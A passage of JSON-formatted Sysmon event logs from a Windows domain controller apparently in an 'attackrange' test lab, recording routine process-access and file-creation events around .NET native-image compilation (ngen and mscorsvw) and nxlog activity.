07:03:34.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001077CD1000}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9108,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:34.591\r\nProcessGuid: {E2A3D6B1-13C6-5F25-0000-0010E5B21100}\r\nProcessId: 4808\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\12c8-0\\System.DirectoryServices.dll\r\nCreationUtcTime: 2020-08-01 07:03:34.591","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:34.591","ProcessGuid":"{E2A3D6B1-13C6-5F25-0000-0010E5B21100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\12c8-0\\System.DirectoryServices.dll","CreationUtcTime":"2020-08-01 07:03:34.591","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9109,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.638\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-0010D9B61100}\r\nTargetProcessId: 4172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.638","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-0010D9B61100}","TargetProcessId":"4172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9110,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.638\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-0010D9B61100}\r\nTargetProcessId: 4172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.638","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-0010D9B61100}","TargetProcessId":"4172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9111,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-0010D9B61100}\r\nTargetProcessId: 4172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-0010D9B61100}","TargetProcessId":"4172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9112,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.701\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-001049BA1100}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.701","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-001049BA1100}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9113,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.701\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-001049BA1100}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.701","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-001049BA1100}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9114,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-001049BA1100}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-001049BA1100}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9115,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:34.997\r\nProcessGuid: {E2A3D6B1-13C6-5F25-0000-001049BA1100}\r\nProcessId: 3756\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\eac-0\\System.Transactions.dll\r\nCreationUtcTime: 2020-08-01 07:03:34.997","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:34.997","ProcessGuid":"{E2A3D6B1-13C6-5F25-0000-001049BA1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\eac-0\\System.Transactions.dll","CreationUtcTime":"2020-08-01 07:03:34.997","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9116,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:35.013\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 